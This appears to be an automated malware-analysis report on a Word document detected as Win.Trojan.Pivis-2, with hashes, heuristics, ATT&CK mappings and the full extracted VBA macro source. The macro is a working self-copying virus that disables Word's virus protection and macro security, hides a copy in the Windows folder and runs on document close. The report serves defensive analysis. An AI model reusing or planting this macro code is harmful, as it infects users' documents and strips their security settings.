Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 68ce329c7ad7c615…

MALICIOUS

Office (OLE)

Size: 31.5 KB
Created: 2004-02-09 18:42:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: 33d8f3a8695c1bce3f4bdb4165708110
SHA-1: 7b39d09b785c059ebb06df793ecb6b7f90f87c5f
SHA-256: 68ce329c7ad7c6151497b79f624064c32e8513fc44ee3f8adde0de27ab3b6a43
Risk score: 180

Malware Insights

Win.Trojan.Pivis-2 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder

The sample is identified as Win.Trojan.Pivis-2 by ClamAV. It contains an Auto_Close VBA macro that runs when the document is closed. The macro attempts to export its own VBA module to 'C:\Windows\ntvck.drv' and potentially re-import it from that path, suggesting an attempt to establish persistence or facilitate further malicious activity. The macro also tampers with Word's security settings: it disables virus protection and sets the macro security level to 1.

Heuristics (5)

  • ClamAV: Win.Trojan.Pivis-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3150 bytes
SHA-256: 2f3ee16a4fb410b977a0b90b7bcfd52f4a805f39b5d04633aa2a8a03c680355f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ntvck"

Sub ntvck()

    ' NTVCK
    ' ==================================
    ' Code by Necronomikon[ZeroGravity]
    ' ==================================
    ' W2KM.ntvck
    ' ==================================

'VirusName: ntvck
'Author Name: nec
'Date and Time:09.02.04 19:39:38
On Error Resume Next
ActiveDocument.ReadOnlyRecommended = False
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayStatusBar = False
Options.ConfirmConversions = False
Options.VirusProtection = False
CommandBars(" Macro ").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("ntvck").Name <> "ntvck" Then
ActiveDocument.VBProject.VBComponents("ntvck").Export ("C:\Windows\ntvck.drv")
SetAttr "C:\Windows\ntvck.drv", 6
End If
If ActiveDocument.VBProject.VBComponents.Item("ntvck").Name <> "ntvck" Then
ActiveDocument.VBProject.VBComponents.import ("C:\Windows\ntvck .drv ")
ActiveDocument.Save
 End If
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(78) + Chr(101) + Chr(99) + Chr(114) + Chr(111) + Chr(110) + Chr(111) + Chr(109) + Chr(105) + Chr(107) + Chr(111) + Chr(110)
.Comments = Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(32) + Chr(119) + Chr(97) + Chr(115) + Chr(32) + Chr(99) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(78) + Chr(84) + Chr(86) + Chr(67) + Chr(75) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(78) + Chr(101) + Chr(99) + Chr(114) + Chr(111) + Chr(110) + Chr(111) + Chr(109) + Chr(105) + Chr(107) + Chr(111) + Chr(110)
.Keywords = Chr(32) + Chr(82) + Chr(101) + Chr(97) + Chr(100) + Chr(121) + Chr(32) + Chr(82) + Chr(97) + Chr(110) + Chr(103) + Chr(101) + Chr(114) + Chr(115) + Chr(32) + Chr(76) + Chr(105) + Chr(98) + Chr(101) + Chr(114) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(32) + Chr(70) + Chr(114) + Chr(111) + Chr(110) + Chr(116)
.Execute
End With

If Day(Now()) = 31 Then Msgbox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(32) + Chr(119) + Chr(97) + Chr(115) + Chr(32) + Chr(99) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(78) + Chr(84) + Chr(86) + Chr(67) + Chr(75) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(78) + Chr(101) + Chr(99) + Chr(114) + Chr(111) + Chr(110) + Chr(111) + Chr(109) + Chr(105) + Chr(107) + Chr(111) + Chr(110)
End Sub
Sub AutoClose()
    On Error Resume Next
Call ntvck
End Sub